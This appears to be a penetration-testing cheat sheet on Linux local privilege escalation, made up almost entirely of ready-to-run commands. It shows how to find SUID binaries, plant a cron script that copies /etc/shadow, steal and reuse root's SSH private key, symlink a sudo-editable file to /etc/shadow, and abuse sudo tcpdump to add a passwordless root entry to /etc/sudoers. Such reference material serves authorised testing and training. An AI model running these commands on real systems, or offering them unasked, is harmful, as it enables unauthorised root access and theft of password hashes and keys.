Local Privilege Escalation

SUID

1
find / -perm -4000 2>/dev/null
Copied!
Exploitation depends on functionality of SUID. Reading files or writing files leads to grabbing SSH / shadow files.

Cron

1
# Find bad privs
2
find /etc/cron* -type f -perm -o+w -exec ls -l {} \;
3
​
4
# Look at when it will run and who as
5
cat /etc/crontab
6
​
7
# Get it to write to shadow file
8
echo -e '#!/bin/bash\n/bin/cat /etc/shadow > /tmp/shadow' > /etc/cron.hourly/oddjob
Copied!

Readable SSH

1
# Check listing root
2
ls -la /root
3
​
4
# Check listing ssh
5
ls -la /root/.ssh
6
​
7
# Read file (worth trying even if you cant list contents of .ssh
8
cat /root/.ssh/id_rsa
9
​
10
# Make SSH dir
11
mkdir /home/<user>/.ssh
12
​
13
# Copy SSH into it
14
cp /root/.ssh/id_rsa /home/<user>/.ssh
15
​
16
# Change Perms
17
chmod o-rwx /home/<user>/.ssh/id_rsa
18
​
19
# SSH
20
ssh -i /home/<user>/.ssh/id_rsa [email protected]
Copied!

Symlink

1
# Check sudo rights
2
sudo -l
3
​
4
# If you have sudo rights for something like nano on a specific file
5
# Create symlink to link that file to shadow and then read it
6
# File in example is readme.txt
7
​
8
ln -s /etc/shadow readme.txt
9
10
# Link to proper terminal
11
export TERM=xterm
12
​
13
#Read file
14
sudo nano readme.txt
Copied!

TCPDump

1
# If tcpdump is in sudo list then we can abuse
2
​
3
# Create a file /tmp/elevate
4
​
5
#!/bin/bash
6
echo β€œjames ALL=(root) NOPASSWD: ALL” >> /etc/sudoers
7
​
8
chmod +x /tmp/elevate
9
10
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/elevate -Z root
11
​
12
sudo bash
Copied!
Last modified 10mo ago